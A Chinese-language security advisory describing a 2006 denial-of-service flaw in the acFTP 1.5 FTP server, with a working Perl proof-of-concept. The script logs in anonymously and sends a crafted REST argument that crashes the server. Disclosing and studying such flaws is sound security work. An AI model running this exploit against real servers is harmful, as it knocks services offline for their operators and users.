acFTP服务器REST/PBSZ参数处理拒绝服务漏洞
发布日期:2006-12-26
更新日期:2006-12-27
受影响系统:acFTP acFTP 1.5
描述:
BUGTRAQ ID:
21767
acFTP是一款开源的基于Windows平台的FTP服务器程序,用于取代Windows系统自带的FTP服务器。
acFTP在处理传送给REST和PBSZ命令的参数时存在输入验证错误,允许攻击者通过提交特制字符串做为上述命令的参数导致拒绝服务。
<*来源:Gabriel Silva (
gabrielquadros@hotmail.com)
链接:
http://secunia.com/advisories/23481/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service #
# author: gbr #
# mail: gabrielquadros[at]hotmail.com #
#################################################
use IO::Socket;
if(!defined($ARGV[0])) {
print "Usage: $0 ip port\n";
exit;
}
my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp')
or die "Could not open a socket: $!\n";
$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
$data .= "{}*{";
}
$sock->send("REST $data\r\n");
# $sock->send("PBSZ $data\r\n");
print "Server exploited\n";
建议:
厂商补丁:
acFTP
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://acftp.sourceforge.net/浏览次数:3186
严重程度:0(网友投票)
